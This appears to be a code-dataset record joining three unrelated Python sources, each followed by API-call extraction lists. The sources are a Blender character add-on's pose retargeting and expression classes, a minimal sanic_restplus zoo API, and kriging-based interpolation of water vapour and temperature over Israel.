l_upperarm_bone = self.get_target_editbone(armat, "upperarm_L")
if l_clavicle_bone and r_clavicle_bone:
upper_point = (l_clavicle_bone.head + r_clavicle_bone.head) * 0.5
elif l_upperarm_bone and r_upperarm_bone:
upper_point = (l_upperarm_bone.tail + r_upperarm_bone.tail) * 0.5
else:
logger.warning("Cannot calculate armature height: clavicles not found")
if l_foot_bone and r_foot_bone:
lower_point = (l_foot_bone.head + r_foot_bone.head)*0.5
elif l_calf_bone and r_calf_bone:
lower_point = (l_calf_bone.head + r_calf_bone.head)*0.5
else:
logger.warning("Cannot calculate armature height: feet not found")
if upper_point and lower_point:
height = upper_point-lower_point
algorithms.select_and_change_mode(armat, 'POSE')
return height.length
return 0
@staticmethod
def remove_armature_constraints(target_armature):
for b in target_armature.pose.bones:
if b.constraints:
for cstr in b.constraints:
if "mbastlab_" in cstr.name:
b.constraints.remove(cstr)
def add_copy_rotations(self, target_armat, source_armat, bones_to_rotate, space='WORLD'):
for b in target_armat.pose.bones:
if b.name in self.skeleton_mapped and b.name in bones_to_rotate:
if self.skeleton_mapped[b.name] and "mbastlab_rot" not in b.constraints:
cstr = b.constraints.new('COPY_ROTATION')
cstr.target = source_armat
cstr.subtarget = self.skeleton_mapped[b.name]
cstr.target_space = space
cstr.owner_space = space
cstr.name = "mbastlab_rot"
def add_copy_location(self, target_armat, source_armat, bones_to_move):
for b in target_armat.pose.bones:
if b.name in self.skeleton_mapped and b.name in bones_to_move:
if "mbastlab_loc" not in b.constraints:
cstr = b.constraints.new('COPY_LOCATION')
cstr.target = source_armat
cstr.subtarget = self.skeleton_mapped[b.name]
cstr.target_space = "WORLD"
cstr.owner_space = "WORLD"
cstr.name = "mbastlab_loc"
def add_armature_constraints(self, target_armat, source_armat):
bones_to_rotate = []
for b in target_armat.pose.bones:
if b.name not in self.local_rotation_bones:
bones_to_rotate.append(b.name)
self.add_copy_rotations(target_armat, source_armat, bones_to_rotate)
self.add_copy_rotations(target_armat, source_armat, self.local_rotation_bones, 'LOCAL')
self.add_copy_location(target_armat, source_armat, ["pelvis"])
def scale_armat(self, target_armat, source_armat):
scale = self.get_armature_proportion(target_armat, source_armat)
source_armat.scale = [scale, scale, scale]
@staticmethod
def clear_animation(armat):
if armat:
armat.animation_data_clear()
def get_armature_proportion(self, target_armat, source_armat):
t_height = self.armature_height(target_armat, 'TARGET')
s_height = self.armature_height(source_armat, 'SOURCE')
if s_height != 0:
armat_prop = t_height/s_height
else:
armat_prop = 1
return armat_prop
def reset_pose(self, armat=None, reset_location=True):
if not armat:
armat = get_active_armature()
if armat:
self.clear_animation(armat)
algorithms.stop_animation()
for p_bone in armat.pose.bones:
algorithms.reset_bone_rot(p_bone)
if reset_location:
if p_bone.name == "pelvis":
p_bone.location = [0, 0, 0]
def load_bones_quaternions(self, armat, data_path):
self.reset_pose(armat)
if armat:
matrix_data = algorithms.load_json_data(data_path, "Pose data")
algorithms.set_object_visible(armat)
algorithms.select_and_change_mode(armat, "POSE")
pose_bones = algorithms.get_pose_bones(armat)
for p_bone in pose_bones:
if p_bone.name in matrix_data:
algorithms.set_bone_rotation(p_bone, mathutils.Quaternion(matrix_data[p_bone.name]))
else:
algorithms.reset_bone_rot(p_bone)
@staticmethod
def save_pose(armat, filepath):
if not armat:
logger.warning('could not save pose')
return
algorithms.select_and_change_mode(armat, "POSE")
matrix_data = {}
algorithms.set_object_visible(armat)
pose_bones = algorithms.get_pose_bones(armat)
for p_bone in pose_bones:
if "muscle" not in p_bone.name and "IK_" not in p_bone.name:
matrix_data[p_bone.name] = [value for value in algorithms.get_bone_rotation(p_bone)]
with open(filepath, 'w') as fp:
json.dump(matrix_data, fp)
def load_pose(self, filepath, target_armature=None, use_retarget=False):
if not target_armature:
target_armature = get_active_armature()
if not target_armature:
return False
self.reset_bones_correction()
self.reset_pose(target_armature)
if use_retarget:
source_armature = algorithms.import_object_from_lib(
self.lib_filepath, "MBLab_skeleton_base_fk", "temporary_armature")
if source_armature:
self.load_bones_quaternions(source_armature, filepath)
self.retarget(target_armature, source_armature, bake_animation=True)
algorithms.remove_object(source_armature)
algorithms.stop_animation()
else:
self.load_bones_quaternions(target_armature, filepath)
self.clear_animation(target_armature)
return True
def load_animation(self, bvh_path, debug_mode=False):
time1 = time.time()
target_armature = get_active_armature()
if not target_armature:
return
self.reset_bones_correction()
if target_armature:
existing_obj_names = algorithms.collect_existing_objects()
self.load_bvh(bvh_path)
source_armature = algorithms.get_newest_object(existing_obj_names)
if source_armature:
if not debug_mode:
self.retarget(target_armature, source_armature, True)
algorithms.remove_object(source_armature)
else:
self.retarget(target_armature, source_armature, False)
algorithms.play_animation()
logger.info("Animation loaded in %s sec.", time.time()-time1)
@staticmethod
def load_bvh(bvh_path):
bpy.context.scene.frame_end = 0
try:
bpy.ops.import_anim.bvh(
filepath=bvh_path,
use_fps_scale=True,
update_scene_duration=True
)
except (FileNotFoundError, IOError):
logger.warning("Standard bvh operator not found: can't import animation.")
def retarget(self, target_armature, source_armature, bake_animation=True):
logger.info("retarget with %s", source_armature.name)
if source_armature and target_armature:
self.init_skeleton_map(source_armature)
self.clear_animation(target_armature)
self.align_skeleton(target_armature, source_armature)
self.scale_armat(target_armature, source_armature)
self.reset_bones_rotations(target_armature)
self.use_animation_pelvis(target_armature, source_armature)
self.align_bones_z_axis(target_armature, source_armature)
self.remove_armature_constraints(target_armature)
self.add_armature_constraints(target_armature, source_armature)
if bake_animation:
scene_modifiers_status = algorithms.get_scene_modifiers_status()
algorithms.set_scene_modifiers_status(False)
algorithms.set_scene_modifiers_status_by_type('ARMATURE', True)
self.bake_animation(target_armature, source_armature)
algorithms.set_scene_modifiers_status(False, scene_modifiers_status)
class ExpressionEngineShapeK:
def __init__(self):
self.has_data = False
self.data_path = algorithms.get_data_path()
self.human_expression_path = os.path.join(
self.data_path,
"expressions_comb",
"human_expressions")
self.anime_expression_path = os.path.join(
self.data_path,
"expressions_comb",
"anime_expressions")
self.expressions_labels = set()
self.human_expressions_data = self.load_expression_database(self.human_expression_path)
self.anime_expressions_data = self.load_expression_database(self.anime_expression_path)
self.expressions_data = {}
self.model_type = "NONE"
self.has_data = True
def identify_model_type(self):
self.model_type = "NONE"
obj = algorithms.get_active_body()
if obj:
current_shapekes_names = algorithms.get_shapekeys_names(obj)
if current_shapekes_names:
if "Expressions_IDHumans_max" in current_shapekes_names:
self.model_type = "HUMAN"
return
if "Expressions_IDAnime_max" in current_shapekes_names:
self.model_type = "ANIME"
return
@staticmethod
def load_expression(filepath):
charac_data = algorithms.load_json_data(filepath, "Character data")
expressions_id = algorithms.simple_path(filepath)
if "manuellab_vers" in charac_data:
if not algorithms.check_version(charac_data["manuellab_vers"]):
logger.info("%s created with vers. %s.",
expressions_id, charac_data["manuellab_vers"])
else:
logger.info("No lab version specified in %s", expressions_id)
if "structural" in charac_data:
char_data = charac_data["structural"]
else:
logger.warning("No structural data in %s", expressions_id)
char_data = None
return char_data
def load_expression_database(self, dirpath):
expressions_data = {}
if algorithms.exists_database(dirpath):
for expression_filename in os.listdir(dirpath):
expression_filepath = os.path.join(dirpath, expression_filename)
e_item, extension = os.path.splitext(expression_filename)
if "json" in extension:
self.expressions_labels.add(e_item)
expressions_data[e_item] = self.load_expression(expression_filepath)
return expressions_data
def sync_expression_to_gui(self):
# Process all expressions: reset all them and then update all them.
# according the GUI value. TODO: optimize.
obj = algorithms.get_active_body()
for expression_name in self.expressions_data:
# Perhaps these two lines are not required
if not hasattr(obj, expression_name):
setattr(obj, expression_name, 0.0)
if hasattr(obj, expression_name):
self.reset_expression(expression_name)
for expression_name in sorted(self.expressions_data.keys()):
if hasattr(obj, expression_name):
express_val = getattr(obj, expression_name)
if express_val != 0:
self.update_expression(expression_name, express_val)
def reset_expressions_gui(self):
obj = algorithms.get_active_body()
for expression_name in self.expressions_data:
if hasattr(obj, expression_name):
setattr(obj, expression_name, 0.0)
self.reset_expression(expression_name)
def update_expressions_data(self):
self.identify_model_type()
if self.model_type == "ANIME":
self.expressions_data = self.anime_expressions_data
if self.model_type == "HUMAN":
self.expressions_data = self.human_expressions_data
if self.model_type == "NONE":
self.expressions_data = {}
def update_expression(self, expression_name, express_val):
obj = algorithms.get_active_body()
if not obj:
return
if not obj.data.shape_keys:
return
if expression_name in self.expressions_data:
expr_data = self.expressions_data[expression_name]
for name, value in expr_data.items():
sk_value = 0
if value < 0.5:
name = f"{name}_min"
sk_value = (0.5 - value) * 2
else:
name = f"{name}_max"
sk_value = (value - 0.5) * 2
sk_value = sk_value*express_val
if sk_value != 0 and hasattr(obj.data.shape_keys, 'key_blocks'):
if name in obj.data.shape_keys.key_blocks:
current_val = obj.data.shape_keys.key_blocks[name].value
obj.data.shape_keys.key_blocks[name].value = min(current_val + sk_value, 1.0)
else:
logger.warning("Expression %s: shapekey %s not found", expression_name, name)
def reset_expression(self, expression_name):
obj = algorithms.get_active_body()
if not obj:
return
if not obj.data.shape_keys:
return
if expression_name in self.expressions_data:
expr_data = self.expressions_data[expression_name]
for name, value in expr_data.items():
name = f"{name}_min" if value < 0.5 else f"{name}_max"
if hasattr(obj.data.shape_keys, 'key_blocks'):
if name in obj.data.shape_keys.key_blocks:
obj.data.shape_keys.key_blocks[name].value = 0
@staticmethod
def keyframe_expression():
obj = algorithms.get_active_body()
if not obj:
return
if not obj.data.shape_keys:
return
if hasattr(obj.data.shape_keys, 'key_blocks'):
for sk in obj.data.shape_keys.key_blocks:
if "Expressions_" in sk.name:
sk.keyframe_insert(data_path="value")
|
[
"json.dump",
"bpy.ops.import_anim.bvh",
"os.path.isdir",
"mathutils.Quaternion",
"bpy.ops.nla.bake",
"bpy.context.view_layer.update",
"time.time",
"os.path.isfile",
"mathutils.Vector",
"mathutils.Euler",
"os.path.splitext",
"functools.lru_cache",
"os.path.join",
"os.listdir",
"logging.getLogger"
] |
[((1309, 1336), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1326, 1336), False, 'import logging\n'), ((14611, 14631), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(2)'}), '(maxsize=2)\n', (14620, 14631), False, 'from functools import lru_cache\n'), ((1574, 1641), 'os.path.join', 'os.path.join', (['self.data_path', 'self.data_path', '"""poses"""', '"""male_poses"""'], {}), "(self.data_path, self.data_path, 'poses', 'male_poses')\n", (1586, 1641), False, 'import os\n'), ((1674, 1743), 'os.path.join', 'os.path.join', (['self.data_path', 'self.data_path', '"""poses"""', '"""female_poses"""'], {}), "(self.data_path, self.data_path, 'poses', 'female_poses')\n", (1686, 1743), False, 'import os\n'), ((1755, 1789), 'os.path.isdir', 'os.path.isdir', (['self.maleposes_path'], {}), '(self.maleposes_path)\n', (1768, 1789), False, 'import os\n'), ((1842, 1878), 'os.path.isdir', 'os.path.isdir', (['self.femaleposes_path'], {}), '(self.femaleposes_path)\n', (1855, 1878), False, 'import os\n'), ((2110, 2165), 'os.path.join', 'os.path.join', (['self.data_path', '"""retarget_knowledge.json"""'], {}), "(self.data_path, 'retarget_knowledge.json')\n", (2122, 2165), False, 'import os\n'), ((45001, 45183), 'bpy.ops.nla.bake', 'bpy.ops.nla.bake', ([], {'frame_start': 'f_range[0]', 'frame_end': 'f_range[1]', 'only_selected': '(False)', 'visual_keying': '(True)', 'clear_constraints': '(False)', 'use_current_action': '(True)', 'bake_types': "{'POSE'}"}), "(frame_start=f_range[0], frame_end=f_range[1],\n only_selected=False, visual_keying=True, clear_constraints=False,\n use_current_action=True, bake_types={'POSE'})\n", (45017, 45183), False, 'import bpy\n'), ((45333, 45375), 'mathutils.Quaternion', 'mathutils.Quaternion', (['(1.0, 0.0, 0.0, 0.0)'], {}), '((1.0, 0.0, 0.0, 0.0))\n', (45353, 45375), False, 'import mathutils\n'), ((47904, 47941), 'mathutils.Quaternion', 'mathutils.Quaternion', (['rot_axis', 'angle'], {}), '(rot_axis, angle)\n', (47924, 47941), False, 'import mathutils\n'), ((47959, 47997), 'mathutils.Quaternion', 'mathutils.Quaternion', (['rot_axis', '(-angle)'], {}), '(rot_axis, -angle)\n', (47979, 47997), False, 'import mathutils\n'), ((48351, 48391), 'mathutils.Quaternion', 'mathutils.Quaternion', (['(0.0, 0.0, 1.0)', '(0)'], {}), '((0.0, 0.0, 1.0), 0)\n', (48371, 48391), False, 'import mathutils\n'), ((49817, 49848), 'bpy.context.view_layer.update', 'bpy.context.view_layer.update', ([], {}), '()\n', (49846, 49848), False, 'import bpy\n'), ((59103, 59114), 'time.time', 'time.time', ([], {}), '()\n', (59112, 59114), False, 'import time\n'), ((61620, 61689), 'os.path.join', 'os.path.join', (['self.data_path', '"""expressions_comb"""', '"""human_expressions"""'], {}), "(self.data_path, 'expressions_comb', 'human_expressions')\n", (61632, 61689), False, 'import os\n'), ((61765, 61834), 'os.path.join', 'os.path.join', (['self.data_path', '"""expressions_comb"""', '"""anime_expressions"""'], {}), "(self.data_path, 'expressions_comb', 'anime_expressions')\n", (61777, 61834), False, 'import os\n'), ((2178, 2211), 'os.path.isfile', 'os.path.isfile', (['self.lib_filepath'], {}), '(self.lib_filepath)\n', (2192, 2211), False, 'import os\n'), ((2216, 2251), 'os.path.isfile', 'os.path.isfile', (['self.knowledge_path'], {}), '(self.knowledge_path)\n', (2230, 2251), False, 'import os\n'), ((58090, 58116), 'json.dump', 'json.dump', (['matrix_data', 'fp'], {}), '(matrix_data, fp)\n', (58099, 58116), False, 'import json\n'), ((59993, 60087), 'bpy.ops.import_anim.bvh', 'bpy.ops.import_anim.bvh', ([], {'filepath': 'bvh_path', 'use_fps_scale': '(True)', 'update_scene_duration': '(True)'}), '(filepath=bvh_path, use_fps_scale=True,\n update_scene_duration=True)\n', (60016, 60087), False, 'import bpy\n'), ((63662, 63681), 'os.listdir', 'os.listdir', (['dirpath'], {}), '(dirpath)\n', (63672, 63681), False, 'import os\n'), ((45497, 45539), 'mathutils.Quaternion', 'mathutils.Quaternion', (['(1.0, 0.0, 0.0, 0.0)'], {}), '((1.0, 0.0, 0.0, 0.0))\n', (45517, 45539), False, 'import mathutils\n'), ((59861, 59872), 'time.time', 'time.time', ([], {}), '()\n', (59870, 59872), False, 'import time\n'), ((63721, 63763), 'os.path.join', 'os.path.join', (['dirpath', 'expression_filename'], {}), '(dirpath, expression_filename)\n', (63733, 63763), False, 'import os\n'), ((63800, 63837), 'os.path.splitext', 'os.path.splitext', (['expression_filename'], {}), '(expression_filename)\n', (63816, 63837), False, 'import os\n'), ((45678, 45716), 'mathutils.Vector', 'mathutils.Vector', (['(0.0, 0.0, 1.0, 0.0)'], {}), '((0.0, 0.0, 1.0, 0.0))\n', (45694, 45716), False, 'import mathutils\n'), ((45818, 45850), 'mathutils.Euler', 'mathutils.Euler', (['(0.0, 0.0, 0.0)'], {}), '((0.0, 0.0, 0.0))\n', (45833, 45850), False, 'import mathutils\n'), ((57377, 57423), 'mathutils.Quaternion', 'mathutils.Quaternion', (['matrix_data[p_bone.name]'], {}), '(matrix_data[p_bone.name])\n', (57397, 57423), False, 'import mathutils\n')]
|
from sanic_restplus import Api
from .cat import api as cat_api
from .dog import api as dog_api
api = Api(
title='Zoo API',
version='1.0',
description='A simple demo API',
additional_css="/static/testme.css"
)
api.add_namespace(cat_api)
api.add_namespace(dog_api)
|
[
"sanic_restplus.Api"
] |
[((103, 212), 'sanic_restplus.Api', 'Api', ([], {'title': '"""Zoo API"""', 'version': '"""1.0"""', 'description': '"""A simple demo API"""', 'additional_css': '"""/static/testme.css"""'}), "(title='Zoo API', version='1.0', description='A simple demo API',\n additional_css='/static/testme.css')\n", (106, 212), False, 'from sanic_restplus import Api\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 18 10:12:42 2020
@author: shlomi
"""
from PW_paths import work_yuval
ims_path = work_yuval / 'IMS_T'
gis_path = work_yuval / 'gis'
awd_path = work_yuval/'AW3D30'
def interpolate_var_ds_at_multiple_dts(var_ds, geo_var_df, predict_df,
time_dim='time', dem_path=awd_path,
H_constant=None):
import pandas as pd
times_df = var_ds[time_dim].to_pandas()
df = pd.DataFrame()
for dt in times_df:
print('interpolating on datetime: {}.'.format(dt))
hdf = slice_var_ds_at_dt_and_convert_to_dataframe(var_ds, geo_var_df,
dt=dt.strftime('%Y-%m-%dT%H:%M:%S'))
# if H is None:
# # estimate scale height H by using all stations' data:
if H_constant is not None:
H = H_constant
else:
H = get_var_lapse_rate(hdf, model='LR', plot=False)
print('scale height is: {} meters.'.format(H))
new_hdf = apply_lapse_rate_change(hdf, H)
df_inter = interpolate_at_one_dt(new_hdf, H, predict_df=predict_df,
dem_path=dem_path, ppd=50)
df_inter['datetime'] = dt
df_inter['H'] = H
df = df.append(df_inter)
df['name'] = df.index
df['datetime'] = pd.to_datetime(df['datetime'])
df.set_index('datetime', inplace=True)
df.index.name = 'time'
return df
def slice_var_ds_at_dt_and_convert_to_dataframe(var_ds, df, dt='2018-04-15T22:00:00'):
"""
slice the var dataset (PWV) with specific datetime and add lat, lon and alt from df
Parameters
----------
var_ds : Xarray Dataset
containing variable such as PWV vs. time.
df : Pandas DataFrame
containing lat, lon and alt cols, indexed by var_ds data_vars.
dt : datetime string, optional
DESCRIPTION. The default is '2018-04-15T22:00:00'.
Returns
-------
hdf : pandas dataframe
sliced var indexed by alt.
"""
time_dim = list(set(var_ds.dims))[0]
var_dt = var_ds.sel({time_dim: dt}).expand_dims(time_dim)
hdf = var_dt.to_dataframe().T
hdf = hdf.join(df[['lat', 'lon', 'alt']])
hdf = hdf.set_index('alt')
hdf = hdf.sort_index().dropna()
return hdf
def get_pressure_lapse_rate(path=ims_path, model='LR', plot=False):
from aux_gps import linear_fit_using_scipy_da_ts
import matplotlib.pyplot as plt
import xarray as xr
from aux_gps import keep_iqr
bp = xr.load_dataset(ims_path / 'IMS_BP_israeli_10mins.nc')
bps = [keep_iqr(bp[x]) for x in bp]
bp = xr.merge(bps)
mean_p = bp.mean('time').to_array('alt')
mean_p.name = 'mean_pressure'
alts = [bp[x].attrs['station_alt'] for x in bp.data_vars]
mean_p['alt'] = alts
_, results = linear_fit_using_scipy_da_ts(mean_p, model=model, slope_factor=1, not_time=True)
slope = results['slope']
inter = results['intercept']
modeled_var = slope * mean_p['alt'] + inter
if plot:
fig, ax = plt.subplots()
modeled_var.plot(ax=ax, color='r')
mean_p.plot.line(linewidth=0., marker='o', ax=ax, color='b')
# lr = 1000 * abs(slope)
textstr = 'Pressure lapse rate: {:.1f} hPa/km'.format(1000 * slope)
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
# place a text box in upper left in axes coords
ax.text(0.5, 0.95, textstr, transform=ax.transAxes, fontsize=12,
verticalalignment='top', bbox=props)
ax.set_xlabel('Height a.s.l [m]')
ax.set_ylabel('Mean Pressure [hPa]')
return results
def get_var_lapse_rate(hdf, model='LR', plot=False):
from aux_gps import linear_fit_using_scipy_da_ts
import matplotlib.pyplot as plt
import numpy as np
hda = hdf.iloc[:, 0].to_xarray()
dt = hda.name.strftime('%Y-%m-%d %H:%M')
hda.name = ''
log_hda = np.log(hda)
# assume pwv = pwv0*exp(-h/H)
# H is the water vapor scale height
_, results = linear_fit_using_scipy_da_ts(log_hda, model=model, slope_factor=1, not_time=True)
H = -1.0 / results['slope']
a0 = np.exp(results['intercept'])
modeled_var = a0 * np.exp(-hda['alt'] / H)
if plot:
fig, ax = plt.subplots()
modeled_var.plot(ax=ax, color='r')
hda.plot.line(linewidth=0., marker='o', ax=ax, color='b')
# lr = 1000 * abs(slope)
ax.set_title(dt)
textstr = 'WV scale height: {:.1f} m'.format(H)
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
# place a text box in upper left in axes coords
ax.text(0.5, 0.95, textstr, transform=ax.transAxes, fontsize=12,
verticalalignment='top', bbox=props)
ax.set_xlabel('Height a.s.l [m]')
ax.set_ylabel('PWV [mm]')
return H
def apply_lapse_rate_change(hdf, H):
import numpy as np
# make sure lapse rate is negative:
assert H > 0
new_hdf = hdf.copy()
new_hdf.iloc[:, 0] = hdf.iloc[:, 0] * np.exp(hdf.index / H)
return new_hdf
def interpolate_at_one_dt(new_hdf, H, predict_df=None, dem_path=awd_path,
ppd=50):
from aux_gps import coarse_dem
import numpy as np
from pykrige.rk import Krige
""" interpolate to Israel grid the values in new_hdf (already removed the lapse rate)
with ppd being the map resolution. if predict_df is not None,
interpolate only to df's locations and altitudes. predict_df should have lat, lon and alt columns"""
# create mesh and load DEM:
da = create_lat_lon_mesh(points_per_degree=ppd) # 500?
# populate the empty mesh grid with stations data:
for i, row in new_hdf.iterrows():
lat = da.sel(lat=row['lat'], method='nearest').lat.values
lon = da.sel(lon=row['lon'], method='nearest').lon.values
da.loc[{'lat': lat, 'lon': lon}] = row.iloc[0]
c = np.linspace(min(da.lat.values), max(da.lat.values), da.shape[0])
r = np.linspace(min(da.lon.values), max(da.lon.values), da.shape[1])
rr, cc = np.meshgrid(r, c)
vals = ~np.isnan(da.values)
X = np.column_stack([rr[vals], cc[vals]])
rr_cc_as_cols = np.column_stack([rr.flatten(), cc.flatten()])
# y = da_scaled.values[vals]
y = da.values[vals]
model = Krige(method='ordinary', variogram_model='spherical',
verbose=True)
model.fit(X, y)
if predict_df is None:
# i.e., interpolate to all map coords:
interpolated = model.predict(rr_cc_as_cols).reshape(da.values.shape)
da_inter = da.copy(data=interpolated)
awd = coarse_dem(da, dem_path=dem_path)
assert H > 0
da_inter *= np.exp(-1.0 * awd / H)
return da_inter
else:
predict_lats = np.linspace(predict_df.lat.min(
), predict_df.lat.max(), predict_df.lat.values.shape[0])
predict_lons = np.linspace(predict_df.lon.min(
), predict_df.lon.max(), predict_df.lon.values.shape[0])
predict_lons_lats_as_cols = np.column_stack(
[predict_lons, predict_lats])
interpolated = model.predict(
predict_lons_lats_as_cols).reshape((predict_lats.shape))
df_inter = predict_df.copy()
df_inter['interpolated'] = interpolated
# fix for lapse rate:
assert H > 0
df_inter['interpolated_lr_fixed'] = df_inter['interpolated'] * np.exp(-1.0 * df_inter['alt'] / H)
return df_inter
def create_lat_lon_mesh(lats=[29.5, 33.5], lons=[34, 36],
points_per_degree=1000):
import xarray as xr
import numpy as np
lat = np.arange(lats[0], lats[1], 1.0 / points_per_degree)
lon = np.arange(lons[0], lons[1], 1.0 / points_per_degree)
nans = np.nan * np.ones((len(lat), len(lon)))
da = xr.DataArray(nans, dims=['lat', 'lon'])
da['lat'] = lat
da['lon'] = lon
return da
def Interpolating_models_ims(time='2013-10-19T22:00:00', var='TD', plot=True,
gis_path=gis_path, method='okrig',
dem_path=work_yuval / 'AW3D30', lapse_rate=5.,
cv=None, rms=None, gridsearch=False):
"""main 2d_interpolation from stations to map"""
# cv usage is {'kfold': 5} or {'rkfold': [2, 3]}
# TODO: try 1d modeling first, like T=f(lat)
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.neighbors import KNeighborsRegressor
from pykrige.rk import Krige
import numpy as np
from sklearn.svm import SVR
from sklearn.linear_model import LinearRegression
from sklearn.ensemble import RandomForestRegressor
from scipy.spatial import Delaunay
from scipy.interpolate import griddata
from sklearn.metrics import mean_squared_error
from aux_gps import coarse_dem
import seaborn as sns
import matplotlib.pyplot as plt
import pyproj
from sklearn.utils.estimator_checks import check_estimator
from pykrige.compat import GridSearchCV
lla = pyproj.Proj(proj='latlong', ellps='WGS84', datum='WGS84')
ecef = pyproj.Proj(proj='geocent', ellps='WGS84', datum='WGS84')
def parse_cv(cv):
from sklearn.model_selection import KFold
from sklearn.model_selection import RepeatedKFold
from sklearn.model_selection import LeaveOneOut
"""input:cv number or string"""
# check for integer:
if 'kfold' in cv.keys():
n_splits = cv['kfold']
print('CV is KFold with n_splits={}'.format(n_splits))
return KFold(n_splits=n_splits)
if 'rkfold' in cv.keys():
n_splits = cv['rkfold'][0]
n_repeats = cv['rkfold'][1]
print('CV is ReapetedKFold with n_splits={},'.format(n_splits) +
' n_repeates={}'.format(n_repeats))
return RepeatedKFold(n_splits=n_splits, n_repeats=n_repeats,
random_state=42)
if 'loo' in cv.keys():
return LeaveOneOut()
# from aux_gps import scale_xr
da = create_lat_lon_mesh(points_per_degree=250) # 500?
awd = coarse_dem(da)
awd = awd.values
geo_snap = geo_pandas_time_snapshot(var=var, datetime=time, plot=False)
if var == 'TD':
[a, b] = np.polyfit(geo_snap['alt'].values, geo_snap['TD'].values, 1)
if lapse_rate == 'auto':
lapse_rate = np.abs(a) * 1000
fig, ax_lapse = plt.subplots(figsize=(10, 6))
sns.regplot(data=geo_snap, x='alt', y='TD', color='r',
scatter_kws={'color': 'b'}, ax=ax_lapse)
suptitle = time.replace('T', ' ')
ax_lapse.set_xlabel('Altitude [m]')
ax_lapse.set_ylabel('Temperature [degC]')
ax_lapse.text(0.5, 0.95, 'Lapse_rate: {:.2f} degC/km'.format(lapse_rate),
horizontalalignment='center', verticalalignment='center',
transform=ax_lapse.transAxes, fontsize=12, color='k',
fontweight='bold')
ax_lapse.grid()
ax_lapse.set_title(suptitle, fontsize=14, fontweight='bold')
# fig.suptitle(suptitle, fontsize=14, fontweight='bold')
alts = []
for i, row in geo_snap.iterrows():
lat = da.sel(lat=row['lat'], method='nearest').lat.values
lon = da.sel(lon=row['lon'], method='nearest').lon.values
alt = row['alt']
if lapse_rate is not None and var == 'TD':
da.loc[{'lat': lat, 'lon': lon}] = row[var] + \
lapse_rate * alt / 1000.0
alts.append(alt)
elif lapse_rate is None or var != 'TD':
da.loc[{'lat': lat, 'lon': lon}] = row[var]
alts.append(alt)
# da_scaled = scale_xr(da)
c = np.linspace(min(da.lat.values), max(da.lat.values), da.shape[0])
r = np.linspace(min(da.lon.values), max(da.lon.values), da.shape[1])
rr, cc = np.meshgrid(r, c)
vals = ~np.isnan(da.values)
if lapse_rate is None:
Xrr, Ycc, Z = pyproj.transform(
lla, ecef, rr[vals], cc[vals], np.array(alts), radians=False)
X = np.column_stack([Xrr, Ycc, Z])
XX, YY, ZZ = pyproj.transform(lla, ecef, rr, cc, awd.values,
radians=False)
rr_cc_as_cols = np.column_stack([XX.flatten(), YY.flatten(), ZZ.flatten()])
else:
X = np.column_stack([rr[vals], cc[vals]])
rr_cc_as_cols = np.column_stack([rr.flatten(), cc.flatten()])
# y = da_scaled.values[vals]
y = da.values[vals]
if method == 'gp-rbf':
from sklearn.gaussian_process.kernels import RBF
from sklearn.gaussian_process.kernels import WhiteKernel
kernel = 1.0 * RBF(length_scale=0.25, length_scale_bounds=(1e-2, 1e3)) \
+ WhiteKernel(noise_level=0.01, noise_level_bounds=(1e-10, 1e+1))
# kernel = None
model = GaussianProcessRegressor(alpha=0.0, kernel=kernel,
n_restarts_optimizer=5,
random_state=42, normalize_y=True)
elif method == 'gp-qr':
from sklearn.gaussian_process.kernels import RationalQuadratic
from sklearn.gaussian_process.kernels import WhiteKernel
kernel = RationalQuadratic(length_scale=100.0) \
+ WhiteKernel(noise_level=0.01, noise_level_bounds=(1e-10, 1e+1))
model = GaussianProcessRegressor(alpha=0.0, kernel=kernel,
n_restarts_optimizer=5,
random_state=42, normalize_y=True)
elif method == 'knn':
model = KNeighborsRegressor(n_neighbors=5, weights='distance')
elif method == 'svr':
model = SVR(C=1.0, cache_size=200, coef0=0.0, degree=3, epsilon=0.1,
gamma='auto_deprecated', kernel='rbf', max_iter=-1,
shrinking=True, tol=0.001, verbose=False)
elif method == 'okrig':
model = Krige(method='ordinary', variogram_model='spherical',
verbose=True)
elif method == 'ukrig':
model = Krige(method='universal', variogram_model='linear',
verbose=True)
# elif method == 'okrig3d':
# # don't bother - MemoryError...
# model = OrdinaryKriging3D(rr[vals], cc[vals], np.array(alts),
# da.values[vals], variogram_model='linear',
# verbose=True)
# awd = coarse_dem(da)
# interpolated, ss = model.execute('grid', r, c, awd['data'].values)
# elif method == 'rkrig':
# # est = LinearRegression()
# est = RandomForestRegressor()
# model = RegressionKriging(regression_model=est, n_closest_points=5,
# verbose=True)
# p = np.array(alts).reshape(-1, 1)
# model.fit(p, X, y)
# P = awd.flatten().reshape(-1, 1)
# interpolated = model.predict(P, rr_cc_as_cols).reshape(da.values.shape)
# try:
# u = check_estimator(model)
# except TypeError:
# u = False
# pass
if cv is not None and not gridsearch: # and u is None):
# from sklearn.model_selection import cross_validate
from sklearn import metrics
cv = parse_cv(cv)
ytests = []
ypreds = []
for train_idx, test_idx in cv.split(X):
X_train, X_test = X[train_idx], X[test_idx] # requires arrays
y_train, y_test = y[train_idx], y[test_idx]
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
# there is only one y-test and y-pred per iteration over the loo.split,
# so to get a proper graph, we append them to respective lists.
ytests += list(y_test)
ypreds += list(y_pred)
true_vals = np.array(ytests)
predicted = np.array(ypreds)
r2 = metrics.r2_score(ytests, ypreds)
ms_error = metrics.mean_squared_error(ytests, ypreds)
print("R^2: {:.5f}%, MSE: {:.5f}".format(r2*100, ms_error))
if gridsearch:
cv = parse_cv(cv)
param_dict = {"method": ["ordinary", "universal"],
"variogram_model": ["linear", "power", "gaussian",
"spherical"],
# "nlags": [4, 6, 8],
# "weight": [True, False]
}
estimator = GridSearchCV(Krige(), param_dict, verbose=True, cv=cv,
scoring='neg_mean_absolute_error',
return_train_score=True, n_jobs=1)
estimator.fit(X, y)
if hasattr(estimator, 'best_score_'):
print('best_score = {:.3f}'.format(estimator.best_score_))
print('best_params = ', estimator.best_params_)
return estimator
# if (cv is not None and not u):
# from sklearn import metrics
# cv = parse_cv(cv)
# ytests = []
# ypreds = []
# for train_idx, test_idx in cv.split(X):
# X_train, X_test = X[train_idx], X[test_idx] # requires arrays
# y_train, y_test = y[train_idx], y[test_idx]
## model = UniversalKriging(X_train[:, 0], X_train[:, 1], y_train,
